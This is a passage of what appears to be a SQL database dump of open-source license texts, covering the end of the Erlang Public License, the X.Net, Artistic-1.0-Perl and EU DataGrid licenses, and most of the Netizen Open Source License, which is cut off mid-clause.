Exhibit A. If it is not possible to put such notice\nin a particular Source Code file due to its structure, then you must include\nsuch notice in a location (such as a relevant directory file) where a user\nwould be likely to look for such a notice. You may choose to offer, and to\ncharge a fee for, warranty, support, indemnity or liability obligations to\none or more recipients of Covered Code. However, You may do so only on Your\nown behalf, and not on behalf of the Initial Developer or any Contributor.\nYou must make it absolutely clear than any such warranty, support, indemnity\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of warranty, support,\nindemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code under a license of Your choice, which may contain\nterms different from this License, provided that You are in compliance with\nthe terms of this License and that the license for the Executable version\ndoes not attempt to limit or alter the recipient\'s rights in the Source Code\nversion from the rights set forth in this License. If You distribute the Executable\nversion under a different license You must make it absolutely clear that any\nterms which differ from this License are offered by You alone, not by the\nInitial Developer or any Contributor. You hereby agree to indemnify the Initial\nDeveloper and every Contributor for any liability incurred by the Initial\nDeveloper or such Contributor as a result of any such terms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n4. Inability to Comply Due to Statute or Regulation. If it is impossible for\nYou to comply with any of the terms of this License with respect to some or\nall of the Covered Code due to statute or regulation then You must: (a) comply\nwith the terms of this License to the maximum extent possible; and (b) describe\nthe limitations and the code they affect. Such description must be included\nin the LEGAL file described in Section 3.4 and must be included with all distributions\nof the Source Code. Except to the extent prohibited by statute or regulation,\nsuch description must be sufficiently detailed for a recipient of ordinary\nskill to be able to understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A, and to related Covered Code.\n\n 6. CONNECTION TO MOZILLA PUBLIC LICENSE\n\nThis Erlang License is a derivative work of the Mozilla Public License, Version\n1.0. It contains terms which differ from the Mozilla Public License, Version\n1.0.\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN ``AS IS\'\' BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR\nA PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE\nDEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR)\nASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\nThis License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n 9. DISCLAIMER OF LIABILITY\n\nAny utilization of Covered Code shall not cause the Initial Developer or any\nContributor to be liable for any damages (neither direct nor indirect).\n\n 10. MISCELLANEOUS\n\nThis License represents the complete agreement concerning the subject matter\nhereof. If any provision is held to be unenforceable, such provision shall\nbe reformed only to the extent necessary to make it enforceable. This License\nshall be construed by and in accordance with the substantive laws of Sweden.\nAny dispute, controversy or claim arising out of or relating to this License,\nor the breach, termination or invalidity thereof, shall be subject to the\nexclusive jurisdiction of Swedish courts, with the Stockholm City Court as\nthe first instance.\n\nEXHIBIT A.\n\n``The contents of this file are subject to the Erlang Public License, Version\n1.1, (the \"License\"); you may not use this file except in compliance with\nthe License. You should have received a copy of the Erlang Public License\nalong with this software. If not, it can be retrieved via the world wide web\nat http://www.erlang.org/.\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Initial Developer of the Original Code is Ericsson Utvecklings AB. Portions\ncreated by Ericsson are Copyright 1999, Ericsson Utvecklings AB. All Rights\nReserved.\'\'\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(215,'Xnet','The X.Net, Inc. License\n\nCopyright (c) 2000-2001 X.Net, Inc. Lafayette, California, USA\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nThis agreement shall be governed in all respects by the laws of the State\nof California and by the laws of the United States of America.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(216,'Artistic-1.0-Perl','The \"Artistic License\"\n\nPreamble\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder as\nspecified below.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as uunet.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) give non-standard executables non-standard names, and clearly document\nthe differences in manual pages (or equivalent), together with instructions\non where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own. You may embed this Package\'s interpreter\nwithin an executable of yours (by linking); this shall be construed as a mere\nform of aggregation, provided that the complete Standard Version of the interpreter\nis so embedded.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whoever generated them, and may be sold commercially,\nand may be aggregated with this Package. If such scripts or library files\nare aggregated with this Package via the so-called \"undump\" or \"unexec\" methods\nof producing a binary executable image, then distribution of such an image\nshall neither be construed as a distribution of this Package nor shall it\nfall under the restrictions of Paragraphs 3 and 4, provided that you do not\nrepresent such an executable image as a Standard Version of this Package.\n\n7. C subroutines (or comparably compiled subroutines in other languages) supplied\nby you and linked into this Package in order to emulate subroutines and variables\nof the language defined by this Package shall not be considered part of this\nPackage, but are the equivalent of input as in Paragraph 6, provided these\nsubroutines do not change the language in any way that would cause it to fail\nthe regression tests for the language.\n\n8. Aggregation of this Package with a commercial distribution is always permitted\nprovided that the use of this Package is embedded; that is, when no overt\nattempt is made to make this Package\'s interfaces visible to the end user\nof the commercial distribution. Such use shall not be construed as a distribution\nof this Package.\n\n9. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n10. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(217,'EUDatagrid','EU DataGrid Software License\n\nCopyright (c) 2001 EU DataGrid. All rights reserved.\n\nThis software includes voluntary contributions made to the EU DataGrid. For\nmore information on the EU DataGrid, please see http://www.eu-datagrid.org/.\n\nInstallation, use, reproduction, display, modification and redistribution\nof this software, with or without modification, in source and binary forms,\nare permitted. Any exercise of rights under this license by you or your sub-licensees\nis subject to the following conditions:\n\n1. Redistributions of this software, with or without modification, must reproduce\nthe above copyright notice and the above license statement as well as this\nlist of conditions, in the software, the user documentation and any other\nmaterials provided with the software.\n\n2. The user documentation, if any, included with a redistribution, must include\nthe following notice:\n\n\"This product includes software developed by the EU DataGrid (http://www.eu-datagrid.org/).\"\n\nAlternatively, if that is where third-party acknowledgments normally appear,\nthis acknowledgment must be reproduced in the software itself.\n\n3. The names \"EDG\", \"EDG Toolkit\", \"EU DataGrid\" and \"EU DataGrid Project\"\nmay not be used to endorse or promote software, or products derived therefrom,\nexcept with prior written permission by hep-project-grid-edg-license@cern.ch.\n\n4. You are under no obligation to provide anyone with any bug fixes, patches,\nupgrades or other modifications, enhancements or derivatives of the features,\nfunctionality or performance of this software that you may develop. However,\nif you publish or distribute your modifications, enhancements or derivative\nworks without contemporaneously requiring users to enter into a separate written\nlicense agreement, then you are deemed to have granted participants in the\nEU DataGrid a worldwide, non-exclusive, royalty-free, perpetual license to\ninstall, use, reproduce, display, modify, redistribute and sub-license your\nmodifications, enhancements or derivative works, whether in binary or source\ncode form, under the license conditions stated in this list of conditions.\n\n 5. DISCLAIMER\n\nTHIS SOFTWARE IS PROVIDED BY THE EU DATAGRID AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY, OF SATISFACTORY QUALITY, AND FITNESS FOR A\nPARTICULAR PURPOSE OR USE ARE DISCLAIMED. THE EU DATAGRID AND CONTRIBUTORS\nMAKE NO REPRESENTATION THAT THE SOFTWARE, MODIFICATIONS, ENHANCEMENTS OR DERIVATIVE\nWORKS THEREOF, WILL NOT INFRINGE ANY PATENT, COPYRIGHT, TRADE SECRET OR OTHER\nPROPRIETARY RIGHT.\n\n 6. LIMITATION OF LIABILITY\n\nTHE EU DATAGRID AND CONTRIBUTORS SHALL HAVE NO LIABILITY TO LICENSEE OR OTHER\nPERSONS FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY,\nOR PUNITIVE DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, PROCUREMENT\nOF SUBSTITUTE GOODS OR SERVICES, LOSS OF USE, DATA OR PROFITS, OR BUSINESS\nINTERRUPTION, HOWEVER CAUSED AND ON ANY THEORY OF CONTRACT, WARRANTY, TORT\n(INCLUDING NEGLIGENCE), PRODUCT LIABILITY OR OTHERWISE, ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGES.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(218,'NOSL','NETIZEN OPEN SOURCE LICENSE\n\nVersion 1.0\n\n 1. Definitions.\n\n1.0.1. \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n 2.2. Contributor Grant.\n\nSubject to third party intellectual property claims, each Contributor hereby\ngrants You a world-wide, royalty-free, non-exclusive license\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n (a) Third Party Claims.\n\nIf Contributor has knowledge that a license under a third party\'s intellectual\nproperty rights is required to exercise the rights granted by such Contributor\nunder Sections 2.1 or 2.2, Contributor must include a text file with the Source\nCode distribution titled \"LEGAL\" which describes the claim and the party making\nthe claim in sufficient detail that a recipient will know whom to contact.\nIf Contributor obtains such knowledge after the Modification is made available\nas described in Section 3.2, Contributor shall promptly modify the LEGAL file\nin all copies Contributor makes available thereafter and shall take other\nsteps (such as notifying appropriate mailing lists or newsgroups) reasonably\ncalculated to inform those who received the Covered Code that new knowledge\nhas been obtained.\n\n (b) Contributor APIs.\n\nIf Contributor\'s Modifications include an application programming interface\nand Contributor has knowledge of patent licenses which are reasonably necessary\nto implement that API, Contributor must also include this information in the\nLEGAL file.\n\n (c) Representations.\n\nContributor represents that, except as disclosed pursuant to Section 3.4(a)\nabove, Contributor believes that Contributor\'s Modifications are Contributor\'s\noriginal creation(s) and/or Contributor has sufficient rights to grant the\nrights conveyed by this License.\n\n 3.5. Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code.\nIf it is not possible to put such notice in a particular Source Code file\ndue to its structure, then You must include such notice in a location (such\nas a relevant directory) where a user would be likely to look for such a notice.\nIf You created one or more Modification(s) You may add your name as a Contributor\nto the notice described in Exhibit A. You must also duplicate this License\nin any documentation for the Source Code where You describe recipients\' rights\nor ownership rights relating to Covered Code. You may choose to offer, and\nto charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Covered Code. However, You may do so only on\nYour own behalf, and not on behalf of the Initial Developer or any Contributor.\nYou must make it absolutely clear than any such warranty, support, indemnity\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of warranty, support,\nindemnity or liability terms You offer.\n\n 3.6. Distribution of Executable Versions.\n\nYou may distribute Covered Code in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Code, and if You include\na notice stating that the Source Code version of the Covered Code is available\nunder the terms of this License, including a description of how and where\nYou have fulfilled the obligations of Section 3.2. The notice must be conspicuously\nincluded in any notice in an Executable version, related documentation or\ncollateral in which You describe recipients\' rights relating to the Covered\nCode. You may distribute the Executable version of Covered Code or ownership\nrights under a license of Your choice, which may contain terms different from\nthis License, provided that You are in compliance with the terms of this License\nand that the license for the Executable version does not attempt to limit\nor alter the recipient\'s rights in the Source Code version from the rights\nset forth in this License. If You distribute the Executable version under\na different license You must make it absolutely clear that any terms which\ndiffer from this License are offered by You alone, not by the Initial Developer\nor any Contributor. You hereby agree to indemnify the Initial Developer and\nevery Contributor for any liability incurred by the Initial Developer or such\nContributor as a result of any such terms You offer.\n\n 3.7. Larger Works.\n\nYou may create a Larger Work by combining Covered Code with other code not\ngoverned by the terms of this License and distribute the Larger Work as a\nsingle LEDs product. In such a case, You must make sure the requirements of\nthis License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1. New Versions.\n\nNetizen Pty Ltd (\"Netizen \") may publish revised and/or new versions of the\nLicense from time to time. Each version will be given a distinguishing version\nnumber.\n\n 6.2. Effect of New Versions.\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Netizen. No one other than Netizen has the right\nto modify the terms applicable to Covered Code created under this License.\n\n 6.3. Derivative Works.\n\nIf You create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), You must (a) rename Your license so that the phrases \"Netizen\",\n\"NOSL\" or any confusingly similar phrase do not appear in your license (except\nto note that your license differs from this License) and (b) otherwise make\nit clear that Your version of the license contains terms which differ from\nthe Netizen Open Source License and Xen Open Source License. (Filling in the\nname of the Initial Developer, Original Code or Contributor in the notice\ndescribed in Exhibit A shall not of themselves be deemed to be modifications\nof this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n7.1 To the extent permitted by law and except as expressly provided to the\ncontrary in this Agreement, all warranties whether express, implied, statutory\nor otherwise, relating in any way to the subject matter of this Agreement\nor to this Agreement generally, are excluded. Where legislation implies in\nthis Agreement any condition or warranty and that legislation avoids or prohibits\nprovisions in a contract excluding or modifying the application of or the\nexercise of or liability under such term, such term shall be deemed to be\nincluded in this Agreement. However, the liability of Supplier for any breach\nof such term shall be limited, at the option of Supplier, to any one or more\nof the following: if the breach related to goods: the replacement of the goods\nor the supply of equivalent goods; the repair of such goods; the payment of\nthe cost of replacing the goods or of acquiring equivalent goods; or the payment\nof the cost of having the goods repaired; and if the breach relates to services\nthe supplying of the services again; or the payment of the cost of having\nthe services supplied again.\n\n 8. TERMINATION.\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable.\n\nThis Agreement shall be governed by and construed according to the law of\nthe State of Victoria. The parties irrevocably submit to the exclusive jurisdiction\nof the Courts of Victoria and Australia and any Courts hearing appeals from\nsuch Courts. This Agreement is deemed to have been made in Victoria.\n\nThe application of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any law or regulation which provides\nthat the language of a contract shall be construed against the drafter shall\nnot apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or 